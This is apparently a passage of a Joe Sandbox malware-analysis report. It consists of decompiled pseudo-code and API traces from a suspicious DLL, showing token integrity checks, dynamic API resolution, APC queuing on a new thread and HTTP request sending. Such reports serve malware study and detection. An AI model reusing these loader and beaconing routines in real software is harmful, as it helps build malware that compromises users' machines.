                    					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                    						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                    						_v8 = 0;
                    						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                    						if(_v8 != 0) {
                    							_t46 = E010C63FD(_v8);
                    							if(_t46 != 0) {
                    								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                    								if(_t33 != 0) {
                    									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                    								}
                    								E010C17AB(_t46);
                    							}
                    						}
                    						CloseHandle(_v12);
                    					}
                    				}
                    				 *_a4 = _v20;
                    				return _v16;
                    			}

                    APIs
                    • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 010C1401
                    • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 010C1421
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 010C1431
                    • CloseHandle.KERNEL32(00000000), ref: 010C1481
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 010C1454
                    • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 010C145C
                    • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 010C146C
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                    • String ID:
                    • API String ID: 1295030180-0
                    • Opcode ID: 3d173533255689fe1f26809580d8a882255de89ee8cf943275cd91bcbb46097e
                    • Instruction ID: 46beb270370c388837b048ffedc51121b0b725fc126c2b1ea5b2b717b8153a02
                    • Opcode Fuzzy Hash: 3d173533255689fe1f26809580d8a882255de89ee8cf943275cd91bcbb46097e
                    • Instruction Fuzzy Hash: 21215C7590021DFFEB109FA4DC44EEEBBB9EB44704F1040A9F690A3291D7764A40EF60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    C-Code - Quality: 64%
                    			E010C18BA(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                    				intOrPtr _v8;
                    				intOrPtr _t9;
                    				intOrPtr _t13;
                    				char* _t19;
                    				char* _t28;
                    				void* _t33;
                    				void* _t34;
                    				char* _t36;
                    				void* _t38;
                    				intOrPtr* _t39;
                    				char* _t40;
                    				char* _t42;
                    				char* _t43;
                    
                    				_t34 = __edx;
                    				_push(__ecx);
                    				_t9 =  *0x10ca320; // 0x26dd5a8
                    				_t1 = _t9 + 0x10cb62c; // 0x253d7325
                    				_t36 = 0;
                    				_t28 = E010C61A7(__ecx, _t1);
                    				if(_t28 != 0) {
                    					_t39 = __imp__;
                    					_t13 =  *_t39(_t28, _t38);
                    					_v8 = _t13;
                    					_t40 = E010C63FD(_v8 +  *_t39(_a4) + 1);
                    					if(_t40 != 0) {
                    						strcpy(_t40, _t28);
                    						_pop(_t33);
                    						__imp__(_t40, _a4);
                    						_t19 = E010C7885(_t33, _t34, _t40, _a8); // executed
                    						_t36 = _t19;
                    						E010C17AB(_t40);
                    						_t42 = E010C6863(StrTrimA(_t36, "="), _t36);
                    						if(_t42 != 0) {
                    							E010C17AB(_t36);
                    							_t36 = _t42;
                    						}
                    						_t43 = E010C5ACD(_t36, _t33);
                    						if(_t43 != 0) {
                    							E010C17AB(_t36);
                    							_t36 = _t43;
                    						}
                    					}
                    					E010C17AB(_t28);
                    				}
                    				return _t36;
                    			}

                    APIs
                      • Part of subcall function 010C61A7: lstrlen.KERNEL32(00000000,00000000,00000000,7691C740,?,?,?,010C18D3,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C620E
                      • Part of subcall function 010C61A7: sprintf.NTDLL ref: 010C622F
                    • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,7691C740,?,?,010C6ABB,?,037A95B0), ref: 010C18E5
                    • lstrlen.KERNEL32(?,?,?,010C6ABB,?,037A95B0), ref: 010C18ED
                      • Part of subcall function 010C63FD: RtlAllocateHeap.NTDLL(00000000,00000000,010C28D5), ref: 010C6409
                    • strcpy.NTDLL ref: 010C1904
                    • lstrcat.KERNEL32(00000000,?), ref: 010C190F
                      • Part of subcall function 010C7885: lstrlen.KERNEL32(?,?,?,00000000,?,010C191E,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C7896
                      • Part of subcall function 010C17AB: HeapFree.KERNEL32(00000000,00000000,010C2976,00000000,?,?,00000000), ref: 010C17B7
                    • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,010C6ABB,?,037A95B0), ref: 010C192C
                      • Part of subcall function 010C6863: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,010C1938,00000000,?,?,010C6ABB,?,037A95B0), ref: 010C686D
                      • Part of subcall function 010C6863: _snprintf.NTDLL ref: 010C68CB
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                    • String ID: =
                    • API String ID: 2864389247-1428090586
                    • Opcode ID: 284d03586e2122723c9de2005c03dc44ff9b9715b559f43144628c7e490e03ad
                    • Instruction ID: 29cdd1e1c2f185ba3c8df29e178c34e4345e59c759e439d93efbf90e310f3ffb
                    • Opcode Fuzzy Hash: 284d03586e2122723c9de2005c03dc44ff9b9715b559f43144628c7e490e03ad
                    • Instruction Fuzzy Hash: BF11CA77901126AB4722ABB98C84CEF36BD9E95E54309015DF680E7201DE79CD029FA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    APIs
                    • SysAllocString.OLEAUT32(?), ref: 010C1E92
                    • IUnknown_QueryInterface_Proxy.RPCRT4(00000008,332C4425,?), ref: 010C1F14
                    • StrStrIW.SHLWAPI(?,006E0069), ref: 010C1F53
                    • SysFreeString.OLEAUT32(?), ref: 010C1F75
                      • Part of subcall function 010C3D67: SysAllocString.OLEAUT32(010C9290), ref: 010C3DB7
                    • SafeArrayDestroy.OLEAUT32(?), ref: 010C1FC9
                    • SysFreeString.OLEAUT32(?), ref: 010C1FD7
                      • Part of subcall function 010C56CF: Sleep.KERNEL32(000001F4), ref: 010C5717
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: String$AllocFree$ArrayDestroyInterface_ProxyQuerySafeSleepUnknown_
                    • String ID:
                    • API String ID: 2118684380-0
                    • Opcode ID: 216b162d34521a8a58224a83c5311affaf4b8fe715cc846e816775fc27985bcd
                    • Instruction ID: 1ee6c9fd2e5bc0320f211d017a413ab5648ddf8740bb069d2a2fa51287a0ea12
                    • Opcode Fuzzy Hash: 216b162d34521a8a58224a83c5311affaf4b8fe715cc846e816775fc27985bcd
                    • Instruction Fuzzy Hash: CA511E3690020AEFDB11DFA8C8848DEB7B6FF88740B148968F695DB215D735AD46CF90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E100013D3(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                    				intOrPtr _v8;
                    				_Unknown_base(*)()* _t29;
                    				_Unknown_base(*)()* _t33;
                    				_Unknown_base(*)()* _t36;
                    				_Unknown_base(*)()* _t39;
                    				_Unknown_base(*)()* _t42;
                    				intOrPtr _t46;
                    				struct HINSTANCE__* _t50;
                    				intOrPtr _t56;
                    
                    				_t56 = E100011B5(0x20);
                    				if(_t56 == 0) {
                    					_v8 = 8;
                    				} else {
                    					_t50 = GetModuleHandleA( *0x100041d0 + 0x10005014);
                    					_v8 = 0x7f;
                    					_t29 = GetProcAddress(_t50,  *0x100041d0 + 0x10005151);
                    					 *(_t56 + 0xc) = _t29;
                    					if(_t29 == 0) {
                    						L8:
                    						E1000164B(_t56);
                    					} else {
                    						_t33 = GetProcAddress(_t50,  *0x100041d0 + 0x10005161);
                    						 *(_t56 + 0x10) = _t33;
                    						if(_t33 == 0) {
                    							goto L8;
                    						} else {
                    							_t36 = GetProcAddress(_t50,  *0x100041d0 + 0x10005174);
                    							 *(_t56 + 0x14) = _t36;
                    							if(_t36 == 0) {
                    								goto L8;
                    							} else {
                    								_t39 = GetProcAddress(_t50,  *0x100041d0 + 0x10005189);
                    								 *(_t56 + 0x18) = _t39;
                    								if(_t39 == 0) {
                    									goto L8;
                    								} else {
                    									_t42 = GetProcAddress(_t50,  *0x100041d0 + 0x1000519f);
                    									 *(_t56 + 0x1c) = _t42;
                    									if(_t42 == 0) {
                    										goto L8;
                    									} else {
                    										 *((intOrPtr*)(_t56 + 8)) = _a8;
                    										 *((intOrPtr*)(_t56 + 4)) = _a4;
                    										_t46 = E10001F61(_t56, _a12); // executed
                    										_v8 = _t46;
                    										if(_t46 != 0) {
                    											goto L8;
                    										} else {
                    											 *_a16 = _t56;
                    										}
                    									}
                    								}
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}













                    APIs
                      • Part of subcall function 100011B5: HeapAlloc.KERNEL32(00000000,?,1000109E,00000030,74E063F0,00000000), ref: 100011C1
                    • GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,10001206,?,?,?,?,?,00000002,?,?), ref: 100013F7
                    • GetProcAddress.KERNEL32(00000000,?), ref: 10001419
                    • GetProcAddress.KERNEL32(00000000,?), ref: 1000142F
                    • GetProcAddress.KERNEL32(00000000,?), ref: 10001445
                    • GetProcAddress.KERNEL32(00000000,?), ref: 1000145B
                    • GetProcAddress.KERNEL32(00000000,?), ref: 10001471
                      • Part of subcall function 10001F61: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74E04EE0,00000000,00000000,?), ref: 10001FBE
                      • Part of subcall function 10001F61: memset.NTDLL ref: 10001FE0
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: AddressProc$AllocCreateHandleHeapModuleSectionmemset
                    • String ID:
                    • API String ID: 1632424568-0
                    • Opcode ID: f54d37019bd0a3907d6a4d2a0eee03f8a27b9bfcd0a2685390fea836632d30ff
                    • Instruction ID: a280ba596086205d6612a48facacf8e39ed2ae595c2d3fb1e7d1c55ba2bff53d
                    • Opcode Fuzzy Hash: f54d37019bd0a3907d6a4d2a0eee03f8a27b9bfcd0a2685390fea836632d30ff
                    • Instruction Fuzzy Hash: 70212CB1A0031AAFE750DF69CC80EEB77ECEB483C4B024565E905D7229EB31E9058B60
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 86%
                    			_entry_(void* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12) {
                    				long _v8;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				char _t9;
                    				void* _t10;
                    				void* _t18;
                    				void* _t23;
                    				void* _t36;
                    
                    				_push(__ecx);
                    				_t9 = _a8;
                    				_v8 = 1;
                    				if(_t9 == 0) {
                    					_t10 = InterlockedDecrement(0x10004188);
                    					__eflags = _t10;
                    					if(_t10 == 0) {
                    						__eflags =  *0x1000418c;
                    						if( *0x1000418c != 0) {
                    							_t36 = 0x2328;
                    							while(1) {
                    								SleepEx(0x64, 1);
                    								__eflags =  *0x10004198;
                    								if( *0x10004198 == 0) {
                    									break;
                    								}
                    								_t36 = _t36 - 0x64;
                    								__eflags = _t36;
                    								if(_t36 > 0) {
                    									continue;
                    								}
                    								break;
                    							}
                    							CloseHandle( *0x1000418c);
                    						}
                    						HeapDestroy( *0x10004190);
                    					}
                    				} else {
                    					if(_t9 == 1 && InterlockedIncrement(0x10004188) == 1) {
                    						_t18 = HeapCreate(0, 0x400000, 0); // executed
                    						_t41 = _t18;
                    						 *0x10004190 = _t18;
                    						if(_t18 == 0) {
                    							L6:
                    							_v8 = 0;
                    						} else {
                    							 *0x100041b0 = _a4;
                    							asm("lock xadd [eax], edi");
                    							_push( &_a8);
                    							_t23 = E1000193D(E100014B7, E10001300(_a12, 1, 0x10004198, _t41));
                    							 *0x1000418c = _t23;
                    							if(_t23 == 0) {
                    								asm("lock xadd [esi], eax");
                    								goto L6;
                    							}
                    						}
                    					}
                    				}
                    				return _v8;
                    			}













                    APIs
                    • InterlockedIncrement.KERNEL32(10004188), ref: 10001D15
                    • HeapCreate.KERNELBASE(00000000,00400000,00000000), ref: 10001D2A
                      • Part of subcall function 1000193D: CreateThread.KERNEL32 ref: 10001954
                      • Part of subcall function 1000193D: QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001969
                      • Part of subcall function 1000193D: GetLastError.KERNEL32(00000000), ref: 10001974
                      • Part of subcall function 1000193D: TerminateThread.KERNEL32(00000000,00000000), ref: 1000197E
                      • Part of subcall function 1000193D: CloseHandle.KERNEL32(00000000), ref: 10001985
                      • Part of subcall function 1000193D: SetLastError.KERNEL32(00000000), ref: 1000198E
                    • InterlockedDecrement.KERNEL32(10004188), ref: 10001D7D
                    • SleepEx.KERNEL32(00000064,00000001), ref: 10001D97
                    • CloseHandle.KERNEL32 ref: 10001DB3
                    • HeapDestroy.KERNEL32 ref: 10001DBF
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: CloseCreateErrorHandleHeapInterlockedLastThread$DecrementDestroyIncrementQueueSleepTerminateUser
                    • String ID:
                    • API String ID: 2110400756-0
                    • Opcode ID: 13dfcc9937a48d62d294691890955a981852baba5314c62008552e9375a091a5
                    • Instruction ID: 6261312e1bd365bc3db350999f739fc83ac6b46b61c7f1ad2c4c54cd954a449e
                    • Opcode Fuzzy Hash: 13dfcc9937a48d62d294691890955a981852baba5314c62008552e9375a091a5
                    • Instruction Fuzzy Hash: 9121CDB1601212ABF701DFA9DCD8ACA7BECFB552E1712842AF505D316CEB309D40CBA4
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E010C43D8(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                    				void* __esi;
                    				long _t10;
                    				void* _t18;
                    				void* _t22;
                    
                    				_t9 = __eax;
                    				_t22 = __eax;
                    				if(_a4 != 0 && E010C395B(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                    					L9:
                    					return GetLastError();
                    				}
                    				_t10 = E010C7A34(_t9, _t18, _t22, _a8); // executed
                    				if(_t10 == 0) {
                    					ResetEvent( *(_t22 + 0x1c));
                    					ResetEvent( *(_t22 + 0x20));
                    					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                    						SetEvent( *(_t22 + 0x1c));
                    						goto L7;
                    					} else {
                    						_t10 = GetLastError();
                    						if(_t10 == 0x3e5) {
                    							L7:
                    							_t10 = 0;
                    						}
                    					}
                    				}
                    				if(_t10 == 0xffffffff) {
                    					goto L9;
                    				}
                    				return _t10;
                    			}








                    APIs
                    • ResetEvent.KERNEL32(?,00000008,?,?,00000102,010C1AE3,?,?,00000000,00000000), ref: 010C4412
                    • ResetEvent.KERNEL32(?), ref: 010C4417
                    • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 010C4424
                    • GetLastError.KERNEL32 ref: 010C442F
                    • GetLastError.KERNEL32(?,?,00000102,010C1AE3,?,?,00000000,00000000), ref: 010C444A
                      • Part of subcall function 010C395B: lstrlen.KERNEL32(00000000,00000008,?,74E04D40,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?,?,00000000), ref: 010C3967
                      • Part of subcall function 010C395B: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,010C43F7,?,?,?,?,00000102,010C1AE3,?), ref: 010C39C5
                      • Part of subcall function 010C395B: lstrcpy.KERNEL32(00000000,00000000), ref: 010C39D5
                    • SetEvent.KERNEL32(?), ref: 010C443D
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: Event$ErrorLastReset$HttpRequestSendlstrcpylstrlenmemcpy
                    • String ID:
                    • API String ID: 3739416942-0
                    • Opcode ID: 9d624b078a56f6dea8588ae26de582068ef879959fa9c46daf2eeaec852565a2
                    • Instruction ID: f95c1384fe8824cf8b0f9942abe5154837bd2f7ff2e1c1f2fe360022495bae55
                    • Opcode Fuzzy Hash: 9d624b078a56f6dea8588ae26de582068ef879959fa9c46daf2eeaec852565a2
                    • Instruction Fuzzy Hash: 9F014F31104201AEEB716F65DC44B5FBAE9FF84B24F304669F9D1D20E0DB21D4149E11
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 100%
                    			E1000193D(long _a4, DWORD* _a12) {
                    				_Unknown_base(*)()* _v0;
                    				void* _t4;
                    				long _t6;
                    				long _t11;
                    				void* _t13;
                    
                    				_t4 = CreateThread(0, 0, __imp__SleepEx,  *0x100041cc, 0, _a12); // executed
                    				_t13 = _t4;
                    				if(_t13 != 0) {
                    					_t6 = QueueUserAPC(_v0, _t13, _a4); // executed
                    					if(_t6 == 0) {
                    						_t11 = GetLastError();
                    						TerminateThread(_t13, _t11);
                    						CloseHandle(_t13);
                    						_t13 = 0;
                    						SetLastError(_t11);
                    					}
                    				}
                    				return _t13;
                    			}









                    APIs
                    • CreateThread.KERNEL32 ref: 10001954
                    • QueueUserAPC.KERNELBASE(?,00000000,?), ref: 10001969
                    • GetLastError.KERNEL32(00000000), ref: 10001974
                    • TerminateThread.KERNEL32(00000000,00000000), ref: 1000197E
                    • CloseHandle.KERNEL32(00000000), ref: 10001985
                    • SetLastError.KERNEL32(00000000), ref: 1000198E
                    Memory Dump Source
                    • Source File: 00000001.00000002.811213505.0000000010000000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                    • Associated: 00000001.00000002.811226505.0000000010005000.00000040.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10000000_loaddll32.jbxd
                    Similarity
                    • API ID: ErrorLastThread$CloseCreateHandleQueueTerminateUser
                    • String ID:
                    • API String ID: 3832013932-0
                    • Opcode ID: 838479c296ba5b9e5e505516a417fd66a98e78a8f80a51d9605afcd81546753f
                    • Instruction ID: 21a3d0af9bea0887cf82ba0fb9141141845726cbf6105ad59c24e03e3f2a7651
                    • Opcode Fuzzy Hash: 838479c296ba5b9e5e505516a417fd66a98e78a8f80a51d9605afcd81546753f
                    • Instruction Fuzzy Hash: 3BF08C72606631BBF3135BA08CACF9BBFACFB097C1F01C504F60991068D72188008BA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 65%
                    			E010C3A12(intOrPtr* __eax, void* __ecx, void* __edx, long _a4, void** _a8, intOrPtr* _a12, char _a16) {
                    				void* _v8;
                    				char _v48;
                    				void* __edi;
                    				intOrPtr _t22;
                    				void* _t26;
                    				intOrPtr _t30;
                    				intOrPtr _t37;
                    				void* _t38;
                    				intOrPtr* _t43;
                    				void* _t44;
                    				void* _t48;
                    				intOrPtr* _t49;
                    				void* _t50;
                    				intOrPtr _t51;
                    
                    				_t48 = __edx;
                    				_t44 = __ecx;
                    				_t43 = _a16;
                    				_t49 = __eax;
                    				_t22 =  *0x10ca320; // 0x26dd5a8
                    				_t2 = _t22 + 0x10cb682; // 0x657a6973
                    				wsprintfA( &_v48, _t2,  *__eax,  *_t43);
                    				_t51 =  *0x10ca3e0; // 0x37a9b60
                    				_push(0x800);
                    				_push(0);
                    				_push( *0x10ca2d8);
                    				if( *0x10ca2ec >= 5) {
                    					_t26 = RtlAllocateHeap(); // executed
                    					if(_t26 == 0) {
                    						L6:
                    						_a4 = 8;
                    						L7:
                    						if(_a4 != 0) {
                    							L10:
                    							 *0x10ca2ec =  *0x10ca2ec + 1;
                    							L11:
                    							return _a4;
                    						}
                    						_t52 = _a16;
                    						 *_t49 = _a16;
                    						_t50 = _v8;
                    						 *_t43 = E010C52A9(_t52, _t50); // executed
                    						_t30 = E010C4DC8(_t50, _t52); // executed
                    						if(_t30 != 0) {
                    							 *_a8 = _t50;
                    							 *_a12 = _t30;
                    							if( *0x10ca2ec < 5) {
                    								 *0x10ca2ec =  *0x10ca2ec & 0x00000000;
                    							}
                    							goto L11;
                    						}
                    						_a4 = 0xbf;
                    						E010C5F6A();
                    						RtlFreeHeap( *0x10ca2d8, 0, _t50); // executed
                    						goto L10;
                    					}
                    					_t37 = E010C68EB(_a4, _t48, _t51,  &_v48,  &_v8,  &_a16, _t26);
                    					L5:
                    					_a4 = _t37;
                    					goto L7;
                    				}
                    				_t38 = RtlAllocateHeap(); // executed
                    				if(_t38 == 0) {
                    					goto L6;
                    				}
                    				_t37 = E010C2FC4(_a4, _t44, _t48, _t51,  &_v48,  &_v8,  &_a16, _t38); // executed
                    				goto L5;
                    			}


















                    APIs
                    • wsprintfA.USER32 ref: 010C3A34
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C3A59
                      • Part of subcall function 010C2FC4: GetTickCount.KERNEL32 ref: 010C2FD8
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3028
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3045
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3065
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C3091
                      • Part of subcall function 010C2FC4: HeapFree.KERNEL32(00000000,00000000), ref: 010C30A3
                      • Part of subcall function 010C2FC4: wsprintfA.USER32 ref: 010C30C4
                      • Part of subcall function 010C2FC4: HeapFree.KERNEL32(00000000,00000000), ref: 010C30D4
                    • RtlAllocateHeap.NTDLL(00000000,00000800), ref: 010C3A7B
                    • RtlFreeHeap.NTDLL(00000000,?,?), ref: 010C3ADF
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: wsprintf$Heap$Free$Allocate$CountTick
                    • String ID: Ut
                    • API String ID: 1428766365-8415677
                    • Opcode ID: 675e789875287581de15535efca2f81e9b95136c58ea5e45e3537a82a2118b13
                    • Instruction ID: 32656b19a183f69e39e1bf172a7addae490520670ec267b1140af325c5aa6e7e
                    • Opcode Fuzzy Hash: 675e789875287581de15535efca2f81e9b95136c58ea5e45e3537a82a2118b13
                    • Instruction Fuzzy Hash: C4314C76A00119EFCB11DFA8D888EDE3BADFB08751F10801AF981D7240EB769554DFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 50%
                    			E010C1000(void** __esi) {
                    				intOrPtr _v0;
                    				intOrPtr _t4;
                    				intOrPtr _t6;
                    				void* _t8;
                    				void* _t9;
                    				intOrPtr _t10;
                    				void* _t11;
                    				void** _t13;
                    
                    				_t13 = __esi;
                    				_t4 =  *0x10ca3cc; // 0x37a95b0
                    				__imp__(_t4 + 0x40);
                    				while(1) {
                    					_t6 =  *0x10ca3cc; // 0x37a95b0
                    					_t1 = _t6 + 0x58; // 0x0
                    					if( *_t1 == 0) {
                    						break;
                    					}
                    					Sleep(0xa);
                    				}
                    				_t8 =  *_t13;
                    				if(_t8 != 0 && _t8 != 0x10ca030) {
                    					HeapFree( *0x10ca2d8, 0, _t8);
                    				}
                    				_t9 = E010C3B61(_v0, _t13); // executed
                    				_t13[1] = _t9;
                    				_t10 =  *0x10ca3cc; // 0x37a95b0
                    				_t11 = _t10 + 0x40;
                    				__imp__(_t11);
                    				return _t11;
                    			}












                    APIs
                    • RtlEnterCriticalSection.NTDLL(037A9570), ref: 010C1009
                    • Sleep.KERNEL32(0000000A), ref: 010C1013
                    • HeapFree.KERNEL32(00000000,00000000), ref: 010C103B
                    • RtlLeaveCriticalSection.NTDLL(037A9570), ref: 010C1057
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.809343460.00000000010C1000.00000020.00020000.sdmp, Offset: 010C0000, based on PE: true
                    • Associated: 00000001.00000002.809327641.00000000010C0000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809376186.00000000010C9000.00000002.00020000.sdmp
                    • Associated: 00000001.00000002.809388376.00000000010CA000.00000004.00020000.sdmp
                    • Associated: 00000001.00000002.809405337.00000000010CC000.00000002.00020000.sdmp
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_10c0000_loaddll32.jbxd
                    Similarity
                    • API ID: CriticalSection$EnterFreeHeapLeaveSleep
                    • String ID: Ut
                    • API String ID: 58946197-8415677
                    • Opcode ID: b9f7be640d3b90ce6ebee966d2565b9277d7fc96b796a93f9a1aae2e3c59e8f9
                    • Instruction ID: 4dd88307fa287eca1e90ee0feb358d83db598c5841029d09b282bb7f13bbd1f9
                    • Opcode Fuzzy Hash: b9f7be640d3b90ce6ebee966d2565b9277d7fc96b796a93f9a1aae2e3c59e8f9
                    • Instruction Fuzzy Hash: 8BF03A70300241EFEB309B6CDC48B0A3BA4AB40B48B208008F5C1D7196D27AE840DF24
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 57%
                    			E010C6535(signed int __edx) {
                    				signed int _v8;
                    				long _v12;
                    				CHAR* _v16;
                    				long _v20;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t21;
                    				CHAR* _t22;
                    				CHAR* _t25;
                    				intOrPtr _t26;
                    				void* _t27;
                    				void* _t31;
                    				void* _t32;
                    				CHAR* _t36;
                    				CHAR* _t42;
                    				CHAR* _t43;
                    				CHAR* _t44;
                    				void* _t49;
                    				void* _t51;
                    				signed char _t56;
                    				intOrPtr _t58;
                    				signed int _t59;
                    				void* _t63;
                    				CHAR* _t67;
                    				CHAR* _t68;
                    				char* _t69;
                    				void* _t70;
                    
                    				_t61 = __edx;
                    				_v20 = 0;
                    				_v8 = 0;
                    				_v12 = 0;
                    				_t21 = E010C4843();
                    				if(_t21 != 0) {
                    					_t59 =  *0x10ca2fc; // 0x2000000a
                    					_t55 = (_t59 & 0xf0000000) + _t21;
                    					 *0x10ca2fc = (_t59 & 0xf0000000) + _t21;
                    				}
                    				_t22 =  *0x10ca178(0, 2); // executed
                    				_v16 = _t22;
                    				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                    					_t25 = E010C1649( &_v8,  &_v20); // executed
                    					_t54 = _t25;
                    					_t26 =  *0x10ca320; // 0x26dd5a8
                    					if( *0x10ca2fc > 5) {
                    						_t8 = _t26 + 0x10cb5cd; // 0x4d283a53
                    						_t27 = _t8;
                    					} else {
                    						_t7 = _t26 + 0x10cb9f5; // 0x44283a44
                    						_t27 = _t7;
                    					}
                    					E010C5A2D(_t27, _t27);
                    					_t31 = E010C414A(_t61,  &_v20,  &_v12); // executed
                    					if(_t31 == 0) {
